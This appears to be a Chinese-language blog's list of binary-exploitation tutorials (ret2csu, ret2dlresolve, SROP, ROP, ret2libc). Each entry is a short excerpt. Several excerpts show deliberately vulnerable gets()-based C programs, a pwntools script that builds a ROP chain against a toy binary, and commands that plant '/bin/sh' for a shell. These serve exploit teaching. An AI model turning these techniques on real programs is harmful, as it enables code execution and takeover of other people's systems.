ret2csu

2023年2月19日

| pwn

漏洞程序 #include <stdio.h> int win(int x, int y, int z) { if(z == 0xdeadbeefcafed00d) { puts("Awesome work!"); } } int main() { puts("Come on then, ret2csu me"); char input[30]; gets(input); return 0; } 利用分析常规利用溢出控制rip指向gadget gadget负责执行win 利用代码： from pwn import * elf = context.binary = ELF('./vuln') p = process() log.info(f'win addr is : {hex(elf.sym.win)}') offset = 40 rop = ROP(elf) rop.raw(offset * 'a') rop.win(0,0,0xdeadbeefcafed00d) p.recv() p.sendline(rop.chain()) result = p.recvline() log.info(result) 上述代码基于一个假设存在可以构建gadget的情况，但实际情……

阅读全文

ret2dlresolve

2023年2月17日

| pwn

概要利用ret2dlresolve，攻击者可以诱导二进制程序解析一个所选择的函数(比如system)为plt。动态链接的ELF对象在第一次使用PLT和GOT调用时导入libc函数。在重定位runtime symbol，RIP将跳转到PLT并尝试解析该符号。在这个过程中，一个&quo……

阅读全文

SROP

2023年2月11日

| pwn

SROP Sigreturn Oriented Programming (SROP), a novel technique for exploits and backdoors in UNIX-like systems. 具体见[1]。漏洞程序 vuln程序 from pwn import * context.arch = 'amd64' context.os = 'linux' elf = ELF.from_assembly( ''' mov rdi, 0; mov rsi, rsp; sub rsi, 8; mov rdx, 500; syscall; ret; pop rax; ret; ''', vma=0x41000 ) elf.save('vuln') └─$ cat /usr/include/asm/unistd_64.h | grep -i sigreturn -A2 #define __NR_rt_sigreturn 15 #define __NR_ioctl 16 #define __NR_pread64 17 嵌入shell地址 ┌──(kali㉿kali)-[~/exploits/srop] └─$ echo -en "/bin/sh\x00" >> vuln ┌──(k……

阅读全文

ROP

2023年2月10日

| pwn

ROP Returned-oriented Program,defeats the W⊕X protections recently deployed by Microsoft,Intel, and AMD;in this context, it can be seen as a generalization of traditional return-into-libc attacks. But the threat is more general . gadget what gadget Each gadget is an arrangement of words on the stack, both pointers to instruction sequences and immediate data words, that when invoked accomplishes some well-defined task “W⊕X,” ensures that no memory location in a process image is marked both writable (“W”) and executable (“X”) gadget feature One gadget might: perform a load operation another an xor and another a conditional branch 案例程序 from pwn import * context.arch = 'amd64' context.os = 'linux' elf = ELF.from_assembly( ''' mov rdi, 0; mov rsi, rsp; sub rsi, 8; mov rdx,……

阅读全文

ret2libc

2023年1月27日

| pwn

ret2libc 程序开启nx保护时候，传统的shellcode在栈上不可执行，无法获取执行shell程序，可以用ret2libc技术。漏洞程序 #include <stdio.h> void vuln() { char buffer[64]; puts("Overflow me"); gets(buffer); } int main() { vuln(); } gcc vuln.c -o -m32 -fno-stack-protector -no-pie vuln-32 └─$ checksec --file=./vuln-32 [*] '/home/kali/exploits/ret2libc/vuln-32' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000) 利用方案 eip直接指向system(’/bin/……

阅读全文